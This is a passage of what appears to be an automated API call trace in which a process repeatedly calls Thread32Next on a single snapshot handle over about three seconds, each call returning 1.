(hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.538] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.539] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.539] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.540] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.541] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.541] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.542] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.542] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.543] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.544] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.544] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.545] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.546] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.547] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.548] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.549] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.550] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.550] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.551] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.551] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.552] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.553] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.553] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.554] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.555] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.748] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.748] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.749] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.750] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.751] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.751] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.752] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.753] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.754] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.754] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.755] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.755] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.756] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.756] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.758] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.758] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.759] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.759] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.760] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.760] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.761] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.762] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.763] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.763] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.764] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.765] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.765] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.766] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.766] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.767] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.768] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.769] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.770] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.770] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.771] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.771] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.772] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.773] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.773] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.774] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.775] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.775] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.776] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.777] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.777] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.778] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.779] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.779] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.780] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.781] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.781] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.782] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0233.782] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.788] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.790] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.791] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.792] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.793] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.794] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.795] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.797] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.797] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.799] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.799] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.800] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.802] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.802] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.803] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.804] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.805] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.806] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.807] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.808] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.808] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.810] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.810] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.811] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.812] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.813] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.814] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.814] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.815] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.816] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.816] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.818] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.818] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.819] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.820] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.821] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.822] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.822] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0234.823] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.134] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.135] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.136] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.137] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.138] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.138] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.139] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.140] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.141] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.142] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.142] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.144] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.144] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.145] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.146] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.147] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.147] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.148] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.149] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.150] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.152] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.153] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.153] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.154] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.155] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.156] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.157] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.157] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.158] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.159] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.160] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.160] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.161] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.163] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.164] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.165] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.166] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.166] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.167] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.168] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.169] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.169] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.170] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.170] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.171] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.171] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.172] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.566] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.567] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.568] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.569] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.570] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.571] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.571] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.572] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.573] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.574] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.574] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.575] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.576] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.577] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.578] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.579] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.579] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.580] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.581] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.582] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.582] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.583] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.583] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.584] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.585] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.585] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.586] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.587] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.587] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.588] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.589] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.589] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.590] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.591] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.591] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.592] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.592] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.593] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.594] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.594] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.595] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.596] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.597] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.598] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.598] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.599] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.828] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.829] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.830] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.830] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.831] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.832] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.834] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.835] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.836] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.836] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.837] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.838] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.839] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.840] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.841] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.841] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.842] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.843] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.843] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.844] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.845] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.846] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.853] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.854] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.854] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.855] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.856] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.857] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.858] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.858] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.859] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.860] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.860] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.861] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.862] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.863] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.863] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.864] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.865] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.866] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.870] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.871] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0235.872] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.137] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.138] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.138] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.139] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.140] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.141] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.142] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.143] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.144] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.144] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.145] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.146] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.146] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.147] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.148] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.148] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.149] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.150] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.151] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.152] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.152] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.153] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.154] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.155] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.156] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.157] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.158] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.159] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.159] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.160] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.161] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.162] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.162] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.163] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.164] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.164] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.165] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.166] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.167] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.168] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.169] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.170] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.171] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.172] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.434] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.435] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.436] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.437] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.438] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.439] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.440] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.441] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.442] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.443] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.443] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.444] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.445] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.446] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.448] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.449] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.450] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.451] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.452] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.452] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.453] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.454] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.455] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.456] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.457] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.458] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.459] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.460] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.461] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.462] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.463] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.463] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.464] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.465] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.466] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.467] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.468] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.469] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.470] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.470] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.756] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.757] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.758] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.758] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.759] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.760] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.761] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.762] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.763] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.764] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.765] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.766] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.767] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.768] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.768] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.769] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.770] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.770] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.773] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.774] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.774] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.775] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.776] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.777] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.777] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.778] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.779] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.779] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 